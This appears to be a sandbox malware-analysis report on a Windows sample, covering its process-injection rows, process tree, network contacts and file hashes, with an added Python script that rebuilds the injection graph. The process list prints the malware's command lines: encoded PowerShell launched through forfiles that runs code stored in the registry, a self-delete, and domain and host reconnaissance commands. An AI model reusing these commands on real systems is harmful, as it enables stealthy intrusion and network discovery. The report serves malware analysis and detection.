PID 1292 wrote to memory of 1580 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1580 wrote to memory of 1544 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1580 wrote to memory of 1544 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1580 wrote to memory of 1544 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1292 wrote to memory of 1472 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1292 wrote to memory of 1472 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1292 wrote to memory of 1472 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1472 wrote to memory of 1124 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1472 wrote to memory of 1124 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1472 wrote to memory of 1124 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1292 wrote to memory of 1368 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 304 wrote to memory of 1368 N/A C:\Users\Admin\AppData\Local\Temp\Restr.exe C:\Windows\Explorer.EXE
PID 1960 wrote to memory of 1752 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\timeout.exe
PID 1960 wrote to memory of 1752 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\timeout.exe
PID 1960 wrote to memory of 1752 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\timeout.exe
PID 1292 wrote to memory of 760 N/A C:\Windows\system32\iexpress.exe C:\Windows\system32\makecab.exe
PID 1292 wrote to memory of 760 N/A C:\Windows\system32\iexpress.exe C:\Windows\system32\makecab.exe
PID 1292 wrote to memory of 760 N/A C:\Windows\system32\iexpress.exe C:\Windows\system32\makecab.exe
PID 980 wrote to memory of 1012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 980 wrote to memory of 1012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 980 wrote to memory of 1012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1012 wrote to memory of 1292 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1012 wrote to memory of 1292 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1012 wrote to memory of 1292 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1364 wrote to memory of 1936 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1364 wrote to memory of 1936 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1364 wrote to memory of 1936 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1936 wrote to memory of 1656 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1936 wrote to memory of 1656 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1936 wrote to memory of 1656 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1908 wrote to memory of 1992 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 1908 wrote to memory of 1992 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 1908 wrote to memory of 1992 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 952 wrote to memory of 1784 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 952 wrote to memory of 1784 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 952 wrote to memory of 1784 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1540 wrote to memory of 1296 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\nslookup.exe
PID 1540 wrote to memory of 1296 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\nslookup.exe
PID 1540 wrote to memory of 1296 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\nslookup.exe
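The sandbox emits a "wrote to memory of" row for ordinary process creation as well (the parent writes into each new child, typically three times in this table), so a single row is not evidence of injection. What matters is the image pair: C:\Windows\Explorer.EXE (PID 1368) is written to by two unrelated processes, powershell.exe (PID 1292) at the end of the cmd -> forfiles -> cmd -> powershell chain and Restr.exe (PID 304, the sample as executed by the sandbox), and Explorer was not started by either of them. That is the injection into an already-running process that the rest of the report's Explorer.EXE activity follows from. PIDs are also reused across the roughly 30-minute run: 1012 is forfiles.exe and later net.exe, 1292 is powershell.exe and later net1.exe (and iexpress.exe), so a tree keyed on PID alone would splice unrelated branches together. The script below is an added example, not sandbox tooling: it parses rows copied from the table above, deduplicates the repeated writes, keys nodes by (pid, image) to survive PID reuse, and prints every root-to-Explorer.EXE chain.

```python
"""Rebuild the process/injection graph from the "Suspicious use of
WriteProcessMemory" rows of a sandbox report.

Added example for this report, not sandbox tooling. REPORT_ROWS is copied
from the behavioral1 table (the sandbox emits one row per write, so
duplicates are expected). PIDs are reused during a long detonation, so
nodes are keyed by (pid, image name) rather than by pid alone.
"""
import re
from collections import defaultdict

# "PID <src> wrote to memory of <dst> N/A <src path> <dst path>"; both paths
# contain spaces, so the first path is matched lazily up to the next " C:\".
ROW_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+) N/A (C:\\.+?) (C:\\.+)$")

# Rows copied verbatim from the report (a subset, duplicates kept on purpose).
REPORT_ROWS = [
    r"PID 2020 wrote to memory of 1840 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE",
    r"PID 1948 wrote to memory of 1012 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\forfiles.exe",
    r"PID 1948 wrote to memory of 1012 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\forfiles.exe",
    r"PID 1948 wrote to memory of 1012 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\forfiles.exe",
    r"PID 1012 wrote to memory of 1120 N/A C:\Windows\system32\forfiles.exe C:\Windows\system32\cmd.exe",
    r"PID 1120 wrote to memory of 1292 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe",
    r"PID 1292 wrote to memory of 1640 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    r"PID 1292 wrote to memory of 1580 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe",
    r"PID 1580 wrote to memory of 1544 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe",
    r"PID 1292 wrote to memory of 1368 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE",
    r"PID 304 wrote to memory of 1368 N/A C:\Users\Admin\AppData\Local\Temp\Restr.exe C:\Windows\Explorer.EXE",
    r"PID 1292 wrote to memory of 760 N/A C:\Windows\system32\iexpress.exe C:\Windows\system32\makecab.exe",
    r"PID 980 wrote to memory of 1012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe",
    r"PID 1012 wrote to memory of 1292 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe",
]


def _image(path):
    """Image name only; the sandbox mixes System32/system32 spellings."""
    return path.rsplit("\\", 1)[-1]


def parse_rows(rows):
    """Unique edges writer -> {targets}; every node is (pid, image)."""
    edges = defaultdict(set)
    for row in rows:
        m = ROW_RE.match(row)
        if m is None:
            raise ValueError("unrecognised row: " + row)
        src_pid, dst_pid, src_path, dst_path = m.groups()
        edges[(int(src_pid), _image(src_path))].add((int(dst_pid), _image(dst_path)))
    return dict(edges)


def chains_to(edges, target_image):
    """Every root-to-target chain for nodes whose image is target_image
    (case-insensitive), each chain a list of 'image(pid)' strings."""
    parents = defaultdict(set)
    for src, dsts in edges.items():
        for dst in dsts:
            parents[dst].add(src)
    nodes = set(edges) | {d for dsts in edges.values() for d in dsts}
    chains = []

    def walk(node, tail, seen):
        path = [node] + tail
        ups = [p for p in parents.get(node, ()) if p not in seen]  # cycle guard
        if not ups:
            chains.append(["%s(%d)" % (img, pid) for pid, img in path])
        for p in ups:
            walk(p, path, seen | {node})

    for node in nodes:
        if node[1].lower() == target_image.lower():
            walk(node, [], frozenset())
    return sorted(chains)


def reused_pids(edges):
    """PIDs seen with more than one image name: evidence of PID reuse."""
    by_pid = defaultdict(set)
    for src, dsts in edges.items():
        for pid, img in (src, *dsts):
            by_pid[pid].add(img)
    return {pid: sorted(imgs) for pid, imgs in by_pid.items() if len(imgs) > 1}


if __name__ == "__main__":
    graph = parse_rows(REPORT_ROWS)
    for chain in chains_to(graph, "explorer.exe"):
        print(" -> ".join(chain))
    print("PID reuse:", reused_pids(graph))
```

Run stand-alone it prints the two chains that end in Explorer.EXE(1368), one rooted at Restr.exe(304) and one at cmd.exe(1948), followed by the reused PIDs; any other image name can be passed to chains_to to inspect a different branch of the same table.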

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\Restr.exe

"C:\Users\Admin\AppData\Local\Temp\Restr.exe"

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2020 CREDAT:275457 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2020 CREDAT:734213 /prefetch:2

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /min forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBvAGQAZQBhAHIAYwBoAGkAdgBlACcAKQAuAFMA & exit" /p C:\Windows\system32 /s /m po*l.e*e

C:\Windows\system32\forfiles.exe

forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBvAGQAZQBhAHIAYwBoAGkAdgBlACcAKQAuAFMA & exit" /p C:\Windows\system32 /s /m po*l.e*e

C:\Windows\system32\cmd.exe

/k "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBvAGQAZQBhAHIAYwBoAGkAdgBlACcAKQAuAFMA & exit

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBvAGQAZQBhAHIAYwBoAGkAdgBlACcAKQAuAFMA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAG8AdgB0AHMAbAB5ACkAOwBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABvAHYAdABzAGwAeQApACcA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAHAAYgBmAG0AYwBnAHQAcwB1AGYAbQApADsAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHAAYgBmAG0AYwBnAHQAcwB1AGYAbQApACcA

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cjxp6gcr.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFFA4.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCFFA3.tmp"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\adua5uv0.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES21.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC20.tmp"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C timeout /t 5 && del "C:\USERS\ADMIN\APPDATA\LOCAL\TEMP\RESTR.EXE"

C:\Windows\system32\timeout.exe

timeout /t 5

C:\Windows\system32\iexpress.exe

iexpress.exe /n /q /m C:\Users\Admin\AppData\Local\Temp\6D90.bin

C:\Windows\system32\makecab.exe

C:\Windows\system32\makecab.exe /f "C:\Users\Admin\~Columnsoftware.DDF"

C:\Windows\system32\cmd.exe

cmd /C "net group "domain computers" /domain" >> C:\Users\Admin\AppData\Local\Temp\A5C0.bin0

C:\Windows\system32\net.exe

net group "domain computers" /domain

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 group "domain computers" /domain

C:\Windows\syswow64\svchost.exe

C:\Windows\syswow64\svchost.exe

C:\Windows\system32\cmd.exe

cmd /C "net session" >> C:\Users\Admin\AppData\Local\Temp\5BA0.bin0

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\cmd.exe

cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\5BA0.bin0 > C:\Users\Admin\AppData\Local\Temp\5BA0.bin & del C:\Users\Admin\AppData\Local\Temp\5BA0.bin0"

C:\Windows\system32\cmd.exe

cmd /C "systeminfo.exe" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

C:\Windows\system32\systeminfo.exe

systeminfo.exe

C:\Windows\system32\cmd.exe

cmd /C "echo -------- 1" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

C:\Windows\system32\cmd.exe

cmd /C "net view" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

C:\Windows\system32\net.exe

net view

C:\Windows\system32\cmd.exe

cmd /C "echo -------- 2" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

C:\Windows\system32\cmd.exe

cmd /C "nslookup 127.0.0.1" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

C:\Windows\system32\nslookup.exe

nslookup 127.0.0.1

C:\Windows\system32\cmd.exe

cmd /C "echo -------- 3" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

C:\Windows\system32\cmd.exe

cmd /C "whoami /all" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

C:\Windows\system32\whoami.exe

whoami /all

C:\Windows\system32\cmd.exe

cmd /C "echo -------- 4" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

C:\Windows\system32\cmd.exe

cmd /C "net localgroup administrators" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

C:\Windows\system32\net.exe

net localgroup administrators

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup administrators

C:\Windows\system32\cmd.exe

cmd /C "echo -------- 5" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

C:\Windows\system32\cmd.exe

cmd /C "net group "domain computers" /domain" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

C:\Windows\system32\net.exe

net group "domain computers" /domain

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 group "domain computers" /domain

C:\Windows\system32\cmd.exe

cmd /C "echo -------- 6" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

C:\Windows\system32\cmd.exe

cmd /C "tasklist.exe /SVC" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

C:\Windows\system32\tasklist.exe

tasklist.exe /SVC

C:\Windows\system32\cmd.exe

cmd /C "echo -------- 7" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

C:\Windows\system32\cmd.exe

cmd /C "driverquery.exe" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

C:\Windows\system32\driverquery.exe

driverquery.exe

C:\Windows\system32\cmd.exe

cmd /C "echo -------- 8" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

C:\Windows\system32\cmd.exe

cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

C:\Windows\system32\reg.exe

reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s

C:\Windows\system32\cmd.exe

cmd /C "echo -------- 9" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

C:\Windows\system32\cmd.exe

cmd /C "wmic computersystem get domain |more" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get domain

C:\Windows\system32\more.com

more

C:\Windows\system32\cmd.exe

cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\7AD4.bin0 > C:\Users\Admin\AppData\Local\Temp\7AD4.bin & del C:\Users\Admin\AppData\Local\Temp\7AD4.bin0"

Network

Country Destination Domain Proto
US 8.8.8.8:53 gogojoob.xyz udp
NL 194.104.136.213:443 gogojoob.xyz tcp
NL 194.104.136.213:443 gogojoob.xyz tcp
NL 194.104.136.213:443 gogojoob.xyz tcp
UA 87.120.36.210:443 tcp
US 209.141.45.189:80 209.141.45.189 tcp
RU 213.183.56.140:8080 213.183.56.140 tcp
US 199.249.230.73:80 199.249.230.73 tcp
ZA 160.119.249.240:80 160.119.249.240 tcp
FR 163.172.139.104:8080 163.172.139.104 tcp
US 198.98.61.131:80 198.98.61.131 tcp
HK 91.245.255.40:80 91.245.255.40 tcp
FR 163.172.139.104:8080 163.172.139.104 tcp
JP 172.104.79.222:80 172.104.79.222 tcp
RU 213.183.56.140:8080 213.183.56.140 tcp
VN 125.212.217.197:80 125.212.217.197 tcp
LV 46.183.217.5:80 46.183.217.5 tcp
RO 89.34.27.237:9030 89.34.27.237 tcp
HK 91.245.255.40:80 91.245.255.40 tcp
NL 50.7.178.34:80 tcp
US 172.104.208.190:80 172.104.208.190 tcp
US 8.8.8.8:53 unavas.xyz udp
US 8.8.8.8:53 microsoft.com udp
NL 91.242.229.120:443 unavas.xyz tcp
CR 200.122.181.78:80 200.122.181.78 tcp
NL 51.15.76.56:9030 51.15.76.56 tcp
MY 124.217.246.98:80 124.217.246.98 tcp
DE 178.254.35.99:80 178.254.35.99 tcp
US 199.249.230.114:80 199.249.230.114 tcp
FR 163.172.139.104:8080 163.172.139.104 tcp
US 67.11.225.49:8080 tcp
RO 89.34.27.237:9030 89.34.27.237 tcp
FR 163.172.139.104:8080 163.172.139.104 tcp
US 199.249.230.142:80 199.249.230.142 tcp
US 199.249.230.73:80 199.249.230.73 tcp
DE 178.254.31.125:80 178.254.31.125 tcp
US 199.249.230.150:80 199.249.230.150 tcp
US 199.249.230.73:80 199.249.230.73 tcp
US 199.249.230.176:80 199.249.230.176 tcp
NL 93.174.93.133:80 93.174.93.133 tcp
US 199.249.230.115:80 199.249.230.115 tcp
US 198.98.61.131:80 198.98.61.131 tcp
US 199.249.230.102:80 199.249.230.102 tcp
US 199.249.230.103:80 199.249.230.103 tcp
US 73.222.93.39:9040 73.222.93.39 tcp
HU 91.219.238.221:80 91.219.238.221 tcp
DE 116.202.179.148:80 116.202.179.148 tcp
SE 193.189.100.202:80 193.189.100.202 tcp
US 199.249.230.103:80 199.249.230.103 tcp
FR 86.105.212.130:9030 86.105.212.130 tcp
DE 79.205.254.110:80 79.205.254.110 tcp
ID 195.123.237.161:80 195.123.237.161 tcp
US 199.249.230.168:80 199.249.230.168 tcp
US 199.249.230.113:80 199.249.230.113 tcp
LV 94.100.6.27:80 94.100.6.27 tcp
MY 124.217.246.98:80 124.217.246.98 tcp
LU 107.189.7.156:80 107.189.7.156 tcp
US 8.8.8.8:53 curlmyip.net udp
FI 135.181.84.242:80 curlmyip.net tcp
US 199.249.230.80:80 199.249.230.80 tcp
ZA 160.119.249.240:80 160.119.249.240 tcp
DE 193.23.244.244:80 193.23.244.244 tcp
DE 92.222.79.186:80 92.222.79.186 tcp
ZA 160.119.249.240:80 160.119.249.240 tcp
DE 179.43.141.92:80 179.43.141.92 tcp
US 199.249.230.176:80 199.249.230.176 tcp
US 185.220.103.120:80 185.220.103.120 tcp
LU 107.189.10.237:80 107.189.10.237 tcp
CH 195.206.105.217:80 195.206.105.217 tcp
US 199.249.230.85:80 199.249.230.85 tcp
US 199.249.230.176:80 199.249.230.176 tcp
ZA 160.119.249.223:80 160.119.249.223 tcp
NL 91.242.229.120:443 unavas.xyz tcp
GB 188.127.69.60:80 tcp
US 199.249.230.144:80 199.249.230.144 tcp
NL 80.100.69.97:80 80.100.69.97 tcp
US 45.61.188.251:80 45.61.188.251 tcp
US 199.249.230.162:80 199.249.230.162 tcp
CL 37.235.52.67:80 37.235.52.67 tcp
US 199.249.230.106:80 199.249.230.106 tcp
DE 90.186.84.208:8080 90.186.84.208 tcp
SE 193.189.100.203:80 193.189.100.203 tcp
US 199.249.230.117:80 199.249.230.117 tcp
US 204.44.81.158:8080 204.44.81.158 tcp
NL 5.79.79.133:80 5.79.79.133 tcp
US 199.249.230.112:80 199.249.230.112 tcp
CA 158.69.205.247:9030 158.69.205.247 tcp
US 199.249.230.169:80 199.249.230.169 tcp
DE 185.216.179.206:80 185.216.179.206 tcp
LV 94.100.6.27:80 94.100.6.27 tcp
US 199.249.230.150:80 199.249.230.150 tcp
KG 91.213.233.60:80 91.213.233.60 tcp
NL 212.83.167.220:9030 212.83.167.220 tcp
CA 199.58.81.140:80 tcp
US 199.249.230.66:80 tcp
NL 91.242.229.120:443 unavas.xyz tcp
NL 91.242.229.120:443 unavas.xyz tcp
US 8.8.8.8:53 curlmyip.net udp
FI 135.181.84.242:80 curlmyip.net tcp
GB 188.127.69.60:80 tcp
CA 199.58.81.140:80 tcp
US 199.249.230.66:80 tcp
NL 91.242.229.120:443 unavas.xyz tcp
NL 91.242.229.120:443 unavas.xyz tcp
US 8.8.8.8:53 curlmyip.net udp
FI 135.181.84.242:80 curlmyip.net tcp
NL 91.242.229.120:443 unavas.xyz tcp
GB 188.127.69.60:80 tcp
CA 199.58.81.140:80 tcp
US 199.249.230.66:80 tcp
NL 91.242.229.120:443 unavas.xyz tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 1.0.0.127.in-addr.arpa udp
NL 91.242.229.120:443 unavas.xyz tcp
US 8.8.8.8:53 curlmyip.net udp
FI 135.181.84.242:80 curlmyip.net tcp
GB 188.127.69.60:80 tcp
CA 199.58.81.140:80 tcp
US 199.249.230.66:80 tcp
NL 91.242.229.120:443 unavas.xyz tcp
US 8.8.8.8:53 microsoft.com udp
NL 91.242.229.120:443 unavas.xyz tcp
US 8.8.8.8:53 curlmyip.net udp
FI 135.181.84.242:80 curlmyip.net tcp
NL 91.242.229.120:443 unavas.xyz tcp
GB 188.127.69.60:80 tcp
CA 199.58.81.140:80 tcp
US 199.249.230.66:80 tcp
NL 91.242.229.120:443 unavas.xyz tcp
NL 91.242.229.120:443 unavas.xyz tcp
US 8.8.8.8:53 curlmyip.net udp
FI 135.181.84.242:80 curlmyip.net tcp
GB 188.127.69.60:80 tcp
CA 199.58.81.140:80 tcp
US 199.249.230.66:80 tcp
NL 91.242.229.120:443 unavas.xyz tcp

Files

memory/304-54-0x000000000052E000-0x0000000000539000-memory.dmp

memory/304-55-0x000000000052E000-0x0000000000539000-memory.dmp

memory/304-56-0x0000000000230000-0x000000000023C000-memory.dmp

memory/304-58-0x0000000001000000-0x000000000106F000-memory.dmp

memory/304-57-0x0000000075C41000-0x0000000075C43000-memory.dmp

memory/304-59-0x0000000000240000-0x0000000000250000-memory.dmp

memory/304-65-0x0000000000270000-0x0000000000272000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\w8w9llr\imagestore.dat

MD5 db9b19619a023808d90d8c33b3445017
SHA1 382a05ad8f0efbcec4631b004a9eb1c0947c47cd
SHA256 37483ec746105f9d6669ad229d4f4b04098a6e7e90584d7adfc188f7866a066c
SHA512 1af7e5c6f0fe074a93da9c6e8cca7afd9e07c27870c69aacd49eb79acca74d349df12dc41589c8f2fc3c408915ccf6f2a321e50856e42cbec6736aed8ad13658

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 70f11d88a2c034021c1964b0d3553522
SHA1 45dd2e2a689af1e23c637d5491bbf03036b96131
SHA256 14b68c058cd1f1971bc1888b1506989df308226167e4b6128c1facaeef053c2e
SHA512 46a735df639d4fdc413325a4f4d29f6894ab05c86335df0055593be171dfe4c72ebdfb13b4e1901603f8425f328c81a2072e338e79c5393a2b1ff5a898a39e48

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

MD5 a93dac0c8b0a75f5c7dd20a9325f5d86
SHA1 eabf861ebe7cc22e938444e1c12e4e006190fe54
SHA256 f31460e823be9de1ce494a4837112166b5c52d3bb3b9b543db2ab36d7fb9fed4
SHA512 27e29188dd432a3bef5a6b79b5546e3ffdedbb724def76ecab6e9ff72ef02a2124bd0bde728752e78e79512618ade0962eb7da52fdc666d44803a21f3a7f3f34

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

MD5 54e9306f95f32e50ccd58af19753d929
SHA1 eab9457321f34d4dcf7d4a0ac83edc9131bf7c57
SHA256 45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72
SHA512 8711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3OL83HNN\favicon[1].ico

MD5 a976d227e5d1dcf62f5f7e623211dd1b
SHA1 a2a9dc1abdd3d888484678663928cb024c359ee6
SHA256 66332859bd8e3441a019e073a318b62a47014ba244121301034b510dc7532271
SHA512 6754d545f2ce095cfa1fa7ca9e3223f89e37726ee7e541ebcf3e209e18b2602f3be8677598cb30d697327a63de032c11dbf8ef7ad7889a79c488a21044c1cb3f

memory/1292-71-0x000007FEFC1E1000-0x000007FEFC1E3000-memory.dmp

memory/1292-72-0x000007FEF2B00000-0x000007FEF365D000-memory.dmp

memory/1292-73-0x000007FEF5B30000-0x000007FEF64CD000-memory.dmp

memory/1292-74-0x00000000025B0000-0x00000000025B2000-memory.dmp

memory/1292-75-0x000007FEF5B30000-0x000007FEF64CD000-memory.dmp

memory/1292-76-0x00000000025B2000-0x00000000025B4000-memory.dmp

memory/1292-77-0x00000000025B4000-0x00000000025B7000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 d61c2a7edf4b81f7be45de1e33d9fb64
SHA1 505daf37edd55e9efe6ad032662bfdaaa788651c
SHA256 2db6ee78cff8ae688651e0b9c188bea826ee6ba5fa408eae308c803550fab37d
SHA512 3ca9955f960cead2ffe589b3e1b6c1fc699fbd8ba66ea46dc9f7811473482e7e00c49ffbaca9a3bf691643a0c15dfd3d5a5e1fb974b46288f74968df3558bce3

memory/1640-80-0x000007FEF2B00000-0x000007FEF365D000-memory.dmp

memory/1292-81-0x00000000025BB000-0x00000000025DA000-memory.dmp

memory/1640-83-0x000007FEF5B30000-0x000007FEF64CD000-memory.dmp

memory/1640-84-0x0000000002340000-0x0000000002342000-memory.dmp

memory/1640-85-0x000007FEF5B30000-0x000007FEF64CD000-memory.dmp

memory/1640-86-0x0000000002342000-0x0000000002344000-memory.dmp

memory/1640-87-0x0000000002344000-0x0000000002347000-memory.dmp

memory/1640-82-0x000000001B830000-0x000000001BB2F000-memory.dmp

memory/1640-88-0x000000000234B000-0x000000000236A000-memory.dmp

